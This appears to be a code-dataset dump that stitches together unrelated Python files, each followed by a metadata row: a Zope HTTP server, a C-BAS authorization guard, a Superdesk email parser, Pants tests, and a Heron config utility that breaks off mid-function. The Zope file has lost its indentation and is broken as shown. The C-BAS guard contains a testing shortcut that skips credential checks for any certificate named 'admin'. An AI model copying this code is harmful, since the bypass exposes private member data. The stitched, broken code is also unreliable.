import zope.deprecation
from zope.server.http import wsgihttpserver
from zope.publisher.publish import publish
import zope.security.management
class PublisherHTTPServer(wsgihttpserver.WSGIHTTPServer):
def __init__(self, request_factory, sub_protocol=None, *args, **kw):
def application(environ, start_response):
request = request_factory(environ['wsgi.input'], environ)
request = publish(request)
response = request.response
start_response(response.getStatusString(), response.getHeaders())
return response.consumeBody()
return super(PublisherHTTPServer, self).__init__(
application, sub_protocol, *args, **kw)
class PMDBHTTPServer(wsgihttpserver.WSGIHTTPServer):
def __init__(self, request_factory, sub_protocol=None, *args, **kw):
def application(environ, start_response):
request = request_factory(environ['wsgi.input'], environ)
try:
request = publish(request, handle_errors=False)
except:
import sys, pdb
print "%s:" % sys.exc_info()[0]
print sys.exc_info()[1]
zope.security.management.restoreInteraction()
try:
pdb.post_mortem(sys.exc_info()[2])
raise
finally:
zope.security.management.endInteraction()
response = request.response
start_response(response.getStatusString(), response.getHeaders())
return response.consumeBody()
return super(PublisherHTTPServer, self).__init__(
application, sub_protocol, *args, **kw)
# BBB: Backward-compatibility.
zope.deprecation.deprecated(
('PublisherHTTPServer', 'PMDBHTTPServer'),
'This plain publisher support has been replaced in favor of the '
'WSGI HTTP server '
'The reference will be gone in Zope 3.4.')
| gpl-3.0 | 1,636,733,148,539,408,000 | 37.478873 | 78 | 0.617496 | false |
EICT/C-BAS | src/plugins/ofed1/omavonedelegateguard.py | 1 | 2181 | from eisoil.config import expand_eisoil_path
import eisoil.core.pluginmanager as pm
import eisoil.core.log
logger=eisoil.core.log.getLogger('ofed')
from omavonedelegate import OMAv1Delegate
gfed_ex = pm.getService('gfedv1exceptions')
config = pm.getService('config')
geniutil = pm.getService('geniutil')
class OMAv1DelegateGuard(OMAv1Delegate):
"""Wraps the OMAv1Delegate and performs authorization."""
# no authentication, hence no overwrite
# def lookup_public_member_info(self, client_cert, field_filter, field_match, options):
def lookup_identifying_member_info(self, client_cert, credentials, field_filter, field_match, options):
result = super(OMAv1DelegateGuard, self).lookup_identifying_member_info(client_cert, credentials, field_filter, field_match, options)
self._authorize_dict_list(client_cert, credentials, result, options)
return result
def lookup_private_member_info(self, client_cert, credentials, field_filter, field_match, options):
result = super(OMAv1DelegateGuard, self).lookup_private_member_info(client_cert, credentials, field_filter, field_match, options)
self._authorize_dict_list(client_cert, credentials, result, options)
return result
def _authorize_dict_list(self, client_cert, credentials, result, options):
client_cert = geniutil.infer_client_cert(client_cert, credentials)
try:
trusted_cert_path = expand_eisoil_path(config.get("ofed.cert_root"))
geniutil.verify_certificate(client_cert, trusted_cert_path)
# TODO remove this (only for testing)
# BEGING REMOVE
client_urn, client_uuid, client_email = geniutil.extract_certificate_info(client_cert)
client_auth, client_type, client_name = geniutil.decode_urn(client_urn)
if not client_name == "admin": # only test if the name is not admin
# END REMOVE
for urn, info in result.iteritems():
geniutil.verify_credential(credentials, client_cert, urn, trusted_cert_path, ('list',))
except Exception as e:
raise gfed_ex.GFedv1AuthorizationError(str(e))
| bsd-3-clause | -7,023,253,175,945,145,000 | 50.928571 | 141 | 0.699679 | false |
mugurrus/superdesk-core | superdesk/io/feed_parsers/rfc822.py | 5 | 20464 |
# -*- coding: utf-8; -*-
#
# This file is part of Superdesk.
#
# Copyright 2013, 2014 Sourcefabric z.u. and contributors.
#
# For the full copyright and license information, please see the
# AUTHORS and LICENSE files distributed with this source code, or
# at https://www.sourcefabric.org/superdesk/license*.
import datetime
import email
import io
import logging
import re
from email.header import decode_header
import eve
from flask import current_app as app, json
from pytz import timezone
import superdesk
from superdesk import get_resource_service
from superdesk.errors import IngestEmailError
from superdesk.io.registry import register_feed_parser
from superdesk.io.feed_parsers import EmailFeedParser
from superdesk.io.iptc import subject_codes
from superdesk.media.media_operations import process_file_from_stream
from superdesk.metadata.item import ITEM_TYPE, CONTENT_TYPE, GUID_TAG, SIGN_OFF, BYLINE, FORMATS, FORMAT
from superdesk.metadata.utils import generate_guid
from superdesk.users.errors import UserNotRegisteredException
from superdesk.utc import utcnow, get_date
from apps.archive.common import format_dateline_to_locmmmddsrc
from superdesk.filemeta import set_filemeta
from superdesk.text_utils import sanitize_html
logger = logging.getLogger(__name__)
email_regex = re.compile('^.*<(.*)>$')
class EMailRFC822FeedParser(EmailFeedParser):
"""
Feed Parser which can parse if the feed is in RFC 822 format.
"""
NAME = 'email_rfc822'
label = 'EMail RFC822 Parser'
def __init__(self):
self.parser_app = app
def can_parse(self, email_message):
for response_part in email_message:
if isinstance(response_part, tuple):
msg = email.message_from_bytes(response_part[1])
return self.parse_header(msg['from']) != ''
return False
def parse(self, data, provider=None):
config = provider.get('config', {})
# If the channel is configured to process structured email generated from a google form
if config.get('formatted', False):
return self._parse_formatted_email(data, provider)
try:
new_items = []
# create an item for the body text of the email
# either text or html
item = dict()
item[ITEM_TYPE] = CONTENT_TYPE.TEXT
item['versioncreated'] = utcnow()
comp_item = None
# a list to keep the references to the attachments
refs = []
html_body = None
text_body = None
for response_part in data:
if isinstance(response_part, tuple):
msg = email.message_from_bytes(response_part[1])
item['headline'] = self.parse_header(msg['subject'])
field_from = self.parse_header(msg['from'])
item['original_source'] = field_from
try:
if email_regex.findall(field_from):
email_address = email_regex.findall(field_from)[0]
user = get_resource_service('users').get_user_by_email(email_address)
item['original_creator'] = user[eve.utils.config.ID_FIELD]
except UserNotRegisteredException:
pass
item['guid'] = msg['Message-ID']
date_tuple = email.utils.parsedate_tz(msg['Date'])
if date_tuple:
dt = datetime.datetime.utcfromtimestamp(
email.utils.mktime_tz(date_tuple))
dt = dt.replace(tzinfo=timezone('utc'))
item['firstcreated'] = dt
# this will loop through all the available multiparts in mail
for part in msg.walk():
if part.get_content_type() == "text/plain":
body = part.get_payload(decode=True)
try:
# if we don't know the charset just have a go!
if part.get_content_charset() is None:
text_body = body.decode()
else:
charset = part.get_content_charset()
text_body = body.decode(charset)
continue
except Exception as ex:
logger.exception(
"Exception parsing text body for {0} from {1}: {2}".format(item['headline'],
field_from, ex))
continue
if part.get_content_type() == "text/html":
body = part.get_payload(decode=True)
try:
if part.get_content_charset() is None:
html_body = body.decode()
else:
charset = part.get_content_charset()
html_body = body.decode(charset)
html_body = sanitize_html(html_body)
continue
except Exception as ex:
logger.exception(
"Exception parsing html body for {0} from {1}: {2}".format(item['headline'],
field_from, ex))
continue
if part.get_content_maintype() == 'multipart':
continue
if part.get('Content-Disposition') is None:
continue
# we are only going to pull off image attachments at this stage
if part.get_content_maintype() != 'image':
continue
fileName = part.get_filename()
if bool(fileName):
image = part.get_payload(decode=True)
content = io.BytesIO(image)
res = process_file_from_stream(content, part.get_content_type())
file_name, content_type, metadata = res
if content_type == 'image/gif' or content_type == 'image/png':
continue
content.seek(0)
image_id = self.parser_app.media.put(content, filename=fileName,
content_type=content_type, metadata=metadata)
renditions = {'baseImage': {'href': image_id}}
# if we have not got a composite item then create one
if not comp_item:
comp_item = dict()
comp_item[ITEM_TYPE] = CONTENT_TYPE.COMPOSITE
comp_item['guid'] = generate_guid(type=GUID_TAG)
comp_item['versioncreated'] = utcnow()
comp_item['groups'] = []
comp_item['headline'] = item['headline']
comp_item['groups'] = []
comp_item['original_source'] = item['original_source']
if 'original_creator' in item:
comp_item['original_creator'] = item['original_creator']
# create a reference to the item that stores the body of the email
item_ref = {'guid': item['guid'], 'residRef': item['guid'],
'headline': item['headline'], 'location': 'ingest',
'itemClass': 'icls:text', 'original_source': item['original_source']}
if 'original_creator' in item:
item_ref['original_creator'] = item['original_creator']
refs.append(item_ref)
media_item = dict()
media_item['guid'] = generate_guid(type=GUID_TAG)
media_item['versioncreated'] = utcnow()
media_item[ITEM_TYPE] = CONTENT_TYPE.PICTURE
media_item['renditions'] = renditions
media_item['mimetype'] = content_type
set_filemeta(media_item, metadata)
media_item['slugline'] = fileName
if text_body is not None:
media_item['body_html'] = text_body
media_item['headline'] = item['headline']
media_item['original_source'] = item['original_source']
if 'original_creator' in item:
media_item['original_creator'] = item['original_creator']
new_items.append(media_item)
# add a reference to this item in the composite item
media_ref = {'guid': media_item['guid'], 'residRef': media_item['guid'],
'headline': fileName, 'location': 'ingest', 'itemClass': 'icls:picture',
'original_source': item['original_source']}
if 'original_creator' in item:
media_ref['original_creator'] = item['original_creator']
refs.append(media_ref)
if html_body:
item['body_html'] = html_body
else:
item['body_html'] = '<pre>' + text_body + '</pre>'
item[FORMAT] = FORMATS.PRESERVED
# if there is composite item then add the main group and references
if comp_item:
grefs = {'refs': [{'idRef': 'main'}], 'id': 'root', 'role': 'grpRole:NEP'}
comp_item['groups'].append(grefs)
grefs = {'refs': refs, 'id': 'main', 'role': 'grpRole:Main'}
comp_item['groups'].append(grefs)
new_items.append(comp_item)
new_items.append(item)
return new_items
except Exception as ex:
raise IngestEmailError.emailParseError(ex, provider)
def parse_header(self, field):
try:
hdr = decode_header(field)
encoding = hdr[0][1]
if encoding and hdr:
parsed_field = hdr[0][0].decode(encoding)
else:
parsed_field = hdr[0][0]
except Exception:
try:
parsed_field = str(field)
except Exception:
parsed_field = 'Unknown'
pass
return parsed_field
def _attr_name_whitelisted(self, attr_name):
return attr_name.lower() in ["href", "style", "color", "size", "bgcolor", "border"]
def safe_css(self, attr, css):
if attr == "style":
return re.sub("(width|height):[^;]+;", "", css)
return css
def _expand_category(self, item, mail_item):
"""Given a list of category names in the incoming email try to look them up to match category codes.
If there is a subject associated with the category it will insert that into the item as well
:param item:
:param mail_item:
:return: An item populated with category codes
"""
anpa_categories = superdesk.get_resource_service('vocabularies').find_one(req=None,
_id='categories')
if anpa_categories:
for mail_category in mail_item.get('Category').split(','):
for anpa_category in anpa_categories['items']:
if anpa_category['is_active'] is True \
and mail_category.strip().lower() == anpa_category['name'].lower():
if 'anpa_category' not in item:
item['anpa_category'] = list()
item['anpa_category'].append({'qcode': anpa_category['qcode']})
if anpa_category.get('subject'):
if 'subject' not in item:
item['subject'] = list()
item['subject'].append({'qcode': anpa_category.get('subject'),
'name': subject_codes[
anpa_category.get('subject')]})
break
def _parse_formatted_email(self, data, provider):
"""Construct an item from an email that was constructed as a notification from a google form submission.
The google form submits to a google sheet, this sheet creates the email as a notification
:param data:
:param provider:
:return: A list of 1 item
"""
try:
item = dict()
item[ITEM_TYPE] = CONTENT_TYPE.TEXT
item['versioncreated'] = utcnow()
for response_part in data:
if isinstance(response_part, tuple):
msg = email.message_from_bytes(response_part[1])
# Check that the subject line matches what we expect, ignore it if not
if self.parse_header(msg['subject']) != 'Formatted Editorial Story':
return []
item['guid'] = msg['Message-ID']
date_tuple = email.utils.parsedate_tz(msg['Date'])
if date_tuple:
dt = datetime.datetime.utcfromtimestamp(
email.utils.mktime_tz(date_tuple))
dt = dt.replace(tzinfo=timezone('utc'))
item['firstcreated'] = dt
for part in msg.walk():
if part.get_content_type() == "text/plain":
body = part.get_payload(decode=True)
# if we don't know the charset just have a go!
if part.get_content_charset() is None:
json_str = body.decode().replace('\r\n', '').replace(' ', ' ')
else:
charset = part.get_content_charset()
json_str = body.decode(charset).replace('\r\n', '').replace(' ', ' ')
mail_item = dict((k, v[0]) for k, v in json.loads(json_str).items())
self._expand_category(item, mail_item)
item['original_source'] = mail_item.get('Username', mail_item.get('Email Address', ''))
item['headline'] = mail_item.get('Headline', '')
item['abstract'] = mail_item.get('Abstract', '')
item['slugline'] = mail_item.get('Slugline', '')
item['body_html'] = '<p>' + mail_item.get('Body', '').replace('\n', '</p><p>') + '</p>'
default_source = app.config.get('DEFAULT_SOURCE_VALUE_FOR_MANUAL_ARTICLES')
city = mail_item.get('Dateline', '')
cities = app.locators.find_cities()
located = [c for c in cities if c['city'].lower() == city.lower()]
item.setdefault('dateline', {})
item['dateline']['located'] = located[0] if len(located) > 0 else {'city_code': city,
'city': city,
'tz': 'UTC',
'dateline': 'city'}
item['dateline']['source'] = default_source
item['dateline']['text'] = format_dateline_to_locmmmddsrc(item['dateline']['located'],
get_date(item['firstcreated']),
source=default_source)
if mail_item.get('Priority') != '':
if mail_item.get('Priority', '3').isdigit():
item['priority'] = int(mail_item.get('Priority', '3'))
else:
priority_map = superdesk.get_resource_service('vocabularies').find_one(
req=None, _id='priority')
priorities = [x for x in priority_map.get('items', []) if
x['name'].upper() == mail_item.get('Priority', '').upper()]
if priorities is not None and len(priorities) > 0:
item['priority'] = int(priorities[0].get('qcode', '3'))
else:
item['priority'] = 3
if mail_item.get('News Value') != '':
item['urgency'] = int(mail_item.get('News Value', '3'))
# We expect the username passed corresponds to a superdesk user
query = {'email': re.compile(
'^{}$'.format(mail_item.get('Username', mail_item.get('Email Address', ''))),
re.IGNORECASE)}
user = superdesk.get_resource_service('users').find_one(req=None, **query)
if not user:
logger.error('Failed to find user for email {}'.format(
mail_item.get('Username', mail_item.get('Email Address', ''))))
raise UserNotRegisteredException()
item['original_creator'] = user.get('_id')
if BYLINE in user and user.get(BYLINE, ''):
item['byline'] = user.get(BYLINE)
item[SIGN_OFF] = user.get(SIGN_OFF)
# attempt to match the given desk name against the defined desks
query = {'name': re.compile('^{}$'.format(mail_item.get('Desk', '')), re.IGNORECASE)}
desk = superdesk.get_resource_service('desks').find_one(
req=None, **query)
if desk:
item['task'] = {'desk': desk.get('_id'), 'stage': desk.get('incoming_stage')}
if 'Place' in mail_item:
locator_map = superdesk.get_resource_service('vocabularies').find_one(req=None,
_id='locators')
place = [x for x in locator_map.get('items', []) if
x['qcode'] == mail_item.get('Place', '').upper()]
if place is not None:
item['place'] = place
if mail_item.get('Legal flag', '') == 'LEGAL':
item['flags'] = {'marked_for_legal': True}
break
return [item]
except Exception as ex:
raise IngestEmailError.emailParseError(ex, provider)
register_feed_parser(EMailRFC822FeedParser.NAME, EMailRFC822FeedParser())
| agpl-3.0 | 8,895,409,023,777,085,000 | 51.071247 | 117 | 0.449765 | false |
jtrobec/pants | tests/python/pants_test/backend/core/tasks/test_dependees.py | 1 | 7068 | # coding=utf-8
# Copyright 2014 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import (absolute_import, division, generators, nested_scopes, print_function,
unicode_literals, with_statement)
from textwrap import dedent
from pants.backend.codegen.targets.java_thrift_library import JavaThriftLibrary
from pants.backend.core.targets.resources import Resources
from pants.backend.core.tasks.dependees import ReverseDepmap
from pants.backend.jvm.targets.jar_dependency import JarDependency
from pants.backend.jvm.targets.jar_library import JarLibrary
from pants.backend.jvm.targets.java_library import JavaLibrary
from pants.backend.jvm.targets.scala_jar_dependency import ScalaJarDependency
from pants.backend.python.targets.python_library import PythonLibrary
from pants.backend.python.targets.python_tests import PythonTests
from pants.build_graph.build_file_aliases import BuildFileAliases
from pants.build_graph.target import Target
from pants_test.tasks.task_test_base import ConsoleTaskTestBase
class BaseReverseDepmapTest(ConsoleTaskTestBase):
@classmethod
def task_type(cls):
return ReverseDepmap
def assert_console_output(self, *args, **kwargs):
# Ensure that the globally-registered spec_excludes option is set, as Dependees consults it.
options = {'spec_excludes': []}
if 'options' in kwargs:
options.update(kwargs['options'])
kwargs['options'] = options
return super(BaseReverseDepmapTest, self).assert_console_output(*args, **kwargs)
class ReverseDepmapEmptyTest(BaseReverseDepmapTest):
def test(self):
self.assert_console_output(targets=[])
class ReverseDepmapTest(BaseReverseDepmapTest):
@property
def alias_groups(self):
return BuildFileAliases(
targets={
'target': Target,
'jar_library': JarLibrary,
'java_library': JavaLibrary,
'java_thrift_library': JavaThriftLibrary,
'python_library': PythonLibrary,
'python_tests': PythonTests,
'resources': Resources,
},
objects={
'jar': JarDependency,
'scala_jar': ScalaJarDependency,
}
)
def setUp(self):
super(ReverseDepmapTest, self).setUp()
def add_to_build_file(path, name, alias=False, deps=()):
self.add_to_build_file(path, dedent("""
{type}(name='{name}',
dependencies=[{deps}]
)
""".format(
type='target' if alias else 'python_library',
name=name,
deps=','.join("'{0}'".format(dep) for dep in list(deps)))
))
add_to_build_file('common/a', 'a', deps=['common/d'])
add_to_build_file('common/b', 'b')
add_to_build_file('common/c', 'c')
add_to_build_file('common/d', 'd')
add_to_build_file('tests/d', 'd', deps=['common/d'])
add_to_build_file('overlaps', 'one', deps=['common/a', 'common/b'])
add_to_build_file('overlaps', 'two', deps=['common/a', 'common/c'])
add_to_build_file('overlaps', 'three', deps=['common/a', 'overlaps:one'])
add_to_build_file('overlaps', 'four', alias=True, deps=['common/b'])
add_to_build_file('overlaps', 'five', deps=['overlaps:four'])
self.add_to_build_file('resources/a', dedent("""
resources(
name='a_resources',
sources=['a.resource']
)
"""))
self.add_to_build_file('src/java/a', dedent("""
java_library(
name='a_java',
resources=['resources/a:a_resources']
)
"""))
#Compile idl tests
self.add_to_build_file('src/thrift/example', dedent("""
java_thrift_library(
name='mybird',
compiler='scrooge',
language='scala',
sources=['1.thrift']
)
"""))
self.add_to_build_file('src/thrift/example', dedent("""
target(
name='compiled_scala',
dependencies=[
':mybird',
]
)
"""))
self.add_to_build_file('src/thrift/example', dedent("""
java_library(
name='compiled_java_user',
dependencies=[
':compiled_scala'
],
sources=['1.java'],
)
"""))
add_to_build_file('src/thrift/dependent', 'my-example', deps=['src/thrift/example:mybird'])
self.add_to_build_file('src/java/example', dedent("""
jar_library(
name='mybird-jars',
jars=[
jar(org='com', name='twitter')
],
)
"""))
#External Dependency tests
self.add_to_build_file('src/java/example', dedent("""
java_library(
name='mybird',
dependencies=[':mybird-jars'],
sources=['1.java'],
)
"""))
self.add_to_build_file('src/java/example', dedent("""
java_library(
name='example2',
dependencies=[
':mybird',
],
sources=['2.java']
)
"""))
def test_roots(self):
self.assert_console_output(
'overlaps:two',
targets=[self.target('common/c')],
extra_targets=[self.target('common/a')]
)
def test_normal(self):
self.assert_console_output(
'overlaps:two',
targets=[self.target('common/c')]
)
def test_closed(self):
self.assert_console_output(
'overlaps:two',
'common/c:c',
targets=[self.target('common/c')],
options={'closed': True}
)
def test_transitive(self):
self.assert_console_output(
'overlaps:one',
'overlaps:three',
'overlaps:four',
'overlaps:five',
targets=[self.target('common/b')],
options={'transitive': True}
)
def test_nodups_dependees(self):
self.assert_console_output(
'overlaps:two',
'overlaps:three',
targets=[
self.target('common/a'),
self.target('overlaps:one')
],
)
def test_nodups_roots(self):
targets = [self.target('common/c')] * 2
self.assertEqual(2, len(targets))
self.assert_console_output(
'overlaps:two',
'common/c:c',
targets=targets,
options={'closed': True}
)
def test_aliasing(self):
self.assert_console_output(
'overlaps:five',
targets=[self.target('overlaps:four')]
)
def test_compile_idls(self):
self.assert_console_output(
'src/thrift/dependent:my-example',
'src/thrift/example:compiled_scala',
targets=[
self.target('src/thrift/example:mybird'),
],
)
def test_external_dependency(self):
self.assert_console_output(
'src/java/example:example2',
targets=[self.target('src/java/example:mybird')]
)
def test_resources_dependees(self):
self.assert_console_output(
'src/java/a:a_java',
targets=[self.target('resources/a:a_resources')]
)
def test_with_spec_excludes(self):
self.assert_console_output(
'overlaps:one',
'overlaps:two',
'overlaps:three',
targets=[self.target('common/a')]
)
self.assert_console_output(
targets=[self.target('common/a')],
options={'spec_excludes': ['overlaps']}
)
| apache-2.0 | -5,422,344,793,211,565,000 | 27.047619 | 96 | 0.614884 | false |
cherrygirl/micronaet-mx8 | l10n_it_ddt_report_aeroo/report/__init__.py | 3 | 1203 | #!/usr/bin/python
# -*- coding: utf-8 -*-
##############################################################################
#
# Copyright (C) 2010-2012 Associazione OpenERP Italia
# (<http://www.openerp-italia.org>).
# Copyright(c)2008-2010 SIA "KN dati".(http://kndati.lv) All Rights Reserved.
# General contacts <[email protected]>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import ddt_parser
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 | 4,866,673,099,820,616,000 | 43.555556 | 80 | 0.613466 | false |
huijunwu/heron | heron/tools/common/src/python/utils/config.py | 1 | 16852 | #!/usr/bin/env python
# -*- encoding: utf-8 -*-
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
'''config.py: util functions for config, mainly for heron-cli'''
import argparse
import contextlib
import getpass
import os
import sys
import subprocess
import tarfile
import tempfile
import yaml
from heron.common.src.python.utils.log import Log
# pylint: disable=logging-not-lazy
# default environ tag, if not provided
ENVIRON = "default"
# directories for heron distribution
BIN_DIR = "bin"
CONF_DIR = "conf"
ETC_DIR = "etc"
LIB_DIR = "lib"
CLI_DIR = ".heron"
RELEASE_YAML = "release.yaml"
ZIPPED_RELEASE_YAML = "scripts/packages/release.yaml"
OVERRIDE_YAML = "override.yaml"
# mode of deployment
DIRECT_MODE = 'direct'
SERVER_MODE = 'server'
# directories for heron sandbox
SANDBOX_CONF_DIR = "./heron-conf"
# config file for heron cli
CLIENT_YAML = "client.yaml"
# client configs for role and env for direct deployment
ROLE_REQUIRED = "heron.config.is.role.required"
ENV_REQUIRED = "heron.config.is.env.required"
# client config for role and env for server deployment
ROLE_KEY = "role.required"
ENVIRON_KEY = "env.required"
def create_tar(tar_filename, files, config_dir, config_files):
'''
Create a tar file with a given set of files
'''
with contextlib.closing(tarfile.open(tar_filename, 'w:gz', dereference=True)) as tar:
for filename in files:
if os.path.isfile(filename):
tar.add(filename, arcname=os.path.basename(filename))
else:
raise Exception("%s is not an existing file" % filename)
if os.path.isdir(config_dir):
tar.add(config_dir, arcname=get_heron_sandbox_conf_dir())
else:
raise Exception("%s is not an existing directory" % config_dir)
for filename in config_files:
if os.path.isfile(filename):
arcfile = os.path.join(get_heron_sandbox_conf_dir(), os.path.basename(filename))
tar.add(filename, arcname=arcfile)
else:
raise Exception("%s is not an existing file" % filename)
def get_subparser(parser, command):
'''
Retrieve the given subparser from parser
'''
# pylint: disable=protected-access
subparsers_actions = [action for action in parser._actions
if isinstance(action, argparse._SubParsersAction)]
# there will probably only be one subparser_action,
# but better save than sorry
for subparsers_action in subparsers_actions:
# get all subparsers
for choice, subparser in list(subparsers_action.choices.items()):
if choice == command:
return subparser
return None
def cygpath(x):
'''
normalized class path on cygwin
'''
command = ['cygpath', '-wp', x]
p = subprocess.Popen(command, stdout=subprocess.PIPE)
result = p.communicate()
output = result[0]
lines = output.split("\n")
return lines[0]
def identity(x):
'''
identity function
'''
return x
def normalized_class_path(x):
'''
normalize path
'''
if sys.platform == 'cygwin':
return cygpath(x)
return identity(x)
def get_classpath(jars):
'''
Get the normalized class path of all jars
'''
return ':'.join(map(normalized_class_path, jars))
def get_heron_dir():
"""
This will extract heron directory from .pex file.
For example,
when __file__ is '/Users/heron-user/bin/heron/heron/tools/common/src/python/utils/config.pyc', and
its real path is '/Users/heron-user/.heron/bin/heron/tools/common/src/python/utils/config.pyc',
the internal variable ``path`` would be '/Users/heron-user/.heron', which is the heron directory
This means the variable `go_above_dirs` below is 9.
:return: root location of the .pex file
"""
go_above_dirs = 9
path = "/".join(os.path.realpath(__file__).split('/')[:-go_above_dirs])
return normalized_class_path(path)
def get_zipped_heron_dir():
"""
This will extract heron directory from .pex file,
with `zip_safe = False' Bazel flag added when building this .pex file
For example,
when __file__'s real path is
'/Users/heron-user/.pex/code/xxxyyy/heron/tools/common/src/python/utils/config.pyc', and
the internal variable ``path`` would be '/Users/heron-user/.pex/code/xxxyyy/',
which is the root PEX directory
This means the variable `go_above_dirs` below is 7.
:return: root location of the .pex file.
"""
go_above_dirs = 7
path = "/".join(os.path.realpath(__file__).split('/')[:-go_above_dirs])
return normalized_class_path(path)
################################################################################
# Get the root of heron dir and various sub directories depending on platform
################################################################################
def get_heron_bin_dir():
"""
This will provide heron bin directory from .pex file.
:return: absolute path of heron lib directory
"""
bin_path = os.path.join(get_heron_dir(), BIN_DIR)
return bin_path
def get_heron_conf_dir():
"""
This will provide heron conf directory from .pex file.
:return: absolute path of heron conf directory
"""
conf_path = os.path.join(get_heron_dir(), CONF_DIR)
return conf_path
def get_heron_lib_dir():
"""
This will provide heron lib directory from .pex file.
:return: absolute path of heron lib directory
"""
lib_path = os.path.join(get_heron_dir(), LIB_DIR)
return lib_path
def get_heron_release_file():
"""
This will provide the path to heron release.yaml file
:return: absolute path of heron release.yaml file in CLI
"""
return os.path.join(get_heron_dir(), RELEASE_YAML)
def get_zipped_heron_release_file():
"""
This will provide the path to heron release.yaml file.
To be used for .pex file built with `zip_safe = False` flag.
For example, `heron-ui'.
:return: absolute path of heron release.yaml file
"""
return os.path.join(get_zipped_heron_dir(), ZIPPED_RELEASE_YAML)
def get_heron_cluster_conf_dir(cluster, default_config_path):
"""
This will provide heron cluster config directory, if config path is default
:return: absolute path of heron cluster conf directory
"""
return os.path.join(default_config_path, cluster)
def get_heron_sandbox_conf_dir():
"""
This will provide heron conf directory in the sandbox
:return: relative path of heron sandbox conf directory
"""
return SANDBOX_CONF_DIR
def get_heron_libs(local_jars):
"""Get all the heron lib jars with the absolute paths"""
heron_lib_dir = get_heron_lib_dir()
heron_libs = [os.path.join(heron_lib_dir, f) for f in local_jars]
return heron_libs
def get_heron_cluster(cluster_role_env):
"""Get the cluster to which topology is submitted"""
return cluster_role_env.split('/')[0]
################################################################################
# pylint: disable=too-many-branches,superfluous-parens
def parse_cluster_role_env(cluster_role_env, config_path):
"""Parse cluster/[role]/[environ], supply default, if not provided, not required"""
parts = cluster_role_env.split('/')[:3]
if not os.path.isdir(config_path):
Log.error("Config path cluster directory does not exist: %s" % config_path)
raise Exception("Invalid config path")
# if cluster/role/env is not completely provided, check further
if len(parts) < 3:
cli_conf_file = os.path.join(config_path, CLIENT_YAML)
# if client conf doesn't exist, use default value
if not os.path.isfile(cli_conf_file):
if len(parts) == 1:
parts.append(getpass.getuser())
if len(parts) == 2:
parts.append(ENVIRON)
else:
cli_confs = {}
with open(cli_conf_file, 'r') as conf_file:
tmp_confs = yaml.load(conf_file)
# the return value of yaml.load can be None if conf_file is an empty file
if tmp_confs is not None:
cli_confs = tmp_confs
else:
print("Failed to read: %s due to it is empty" % (CLIENT_YAML))
# if role is required but not provided, raise exception
if len(parts) == 1:
if (ROLE_REQUIRED in cli_confs) and (cli_confs[ROLE_REQUIRED] is True):
raise Exception("role required but not provided (cluster/role/env = %s). See %s in %s"
% (cluster_role_env, ROLE_REQUIRED, cli_conf_file))
else:
parts.append(getpass.getuser())
# if environ is required but not provided, raise exception
if len(parts) == 2:
if (ENV_REQUIRED in cli_confs) and (cli_confs[ENV_REQUIRED] is True):
raise Exception("environ required but not provided (cluster/role/env = %s). See %s in %s"
% (cluster_role_env, ENV_REQUIRED, cli_conf_file))
else:
parts.append(ENVIRON)
# if cluster or role or environ is empty, print
if len(parts[0]) == 0 or len(parts[1]) == 0 or len(parts[2]) == 0:
print("Failed to parse")
sys.exit(1)
return (parts[0], parts[1], parts[2])
################################################################################
def get_cluster_role_env(cluster_role_env):
"""Parse cluster/[role]/[environ], supply empty string, if not provided"""
parts = cluster_role_env.split('/')[:3]
if len(parts) == 3:
return (parts[0], parts[1], parts[2])
if len(parts) == 2:
return (parts[0], parts[1], "")
if len(parts) == 1:
return (parts[0], "", "")
return ("", "", "")
################################################################################
def direct_mode_cluster_role_env(cluster_role_env, config_path):
"""Check cluster/[role]/[environ], if they are required"""
# otherwise, get the client.yaml file
cli_conf_file = os.path.join(config_path, CLIENT_YAML)
# if client conf doesn't exist, use default value
if not os.path.isfile(cli_conf_file):
return True
client_confs = {}
with open(cli_conf_file, 'r') as conf_file:
client_confs = yaml.load(conf_file)
# the return value of yaml.load can be None if conf_file is an empty file
if not client_confs:
return True
# if role is required but not provided, raise exception
role_present = True if len(cluster_role_env[1]) > 0 else False
if ROLE_REQUIRED in client_confs and client_confs[ROLE_REQUIRED] and not role_present:
raise Exception("role required but not provided (cluster/role/env = %s). See %s in %s"
% (cluster_role_env, ROLE_REQUIRED, cli_conf_file))
# if environ is required but not provided, raise exception
environ_present = True if len(cluster_role_env[2]) > 0 else False
if ENV_REQUIRED in client_confs and client_confs[ENV_REQUIRED] and not environ_present:
raise Exception("environ required but not provided (cluster/role/env = %s). See %s in %s"
% (cluster_role_env, ENV_REQUIRED, cli_conf_file))
return True
################################################################################
def server_mode_cluster_role_env(cluster_role_env, config_map):
"""Check cluster/[role]/[environ], if they are required"""
cmap = config_map[cluster_role_env[0]]
# if role is required but not provided, raise exception
role_present = True if len(cluster_role_env[1]) > 0 else False
if ROLE_KEY in cmap and cmap[ROLE_KEY] and not role_present:
raise Exception("role required but not provided (cluster/role/env = %s)."\
% (cluster_role_env))
# if environ is required but not provided, raise exception
environ_present = True if len(cluster_role_env[2]) > 0 else False
if ENVIRON_KEY in cmap and cmap[ENVIRON_KEY] and not environ_present:
raise Exception("environ required but not provided (cluster/role/env = %s)."\
% (cluster_role_env))
return True
################################################################################
def defaults_cluster_role_env(cluster_role_env):
"""
if role is not provided, supply userid
if environ is not provided, supply 'default'
"""
if len(cluster_role_env[1]) == 0 and len(cluster_role_env[2]) == 0:
return (cluster_role_env[0], getpass.getuser(), ENVIRON)
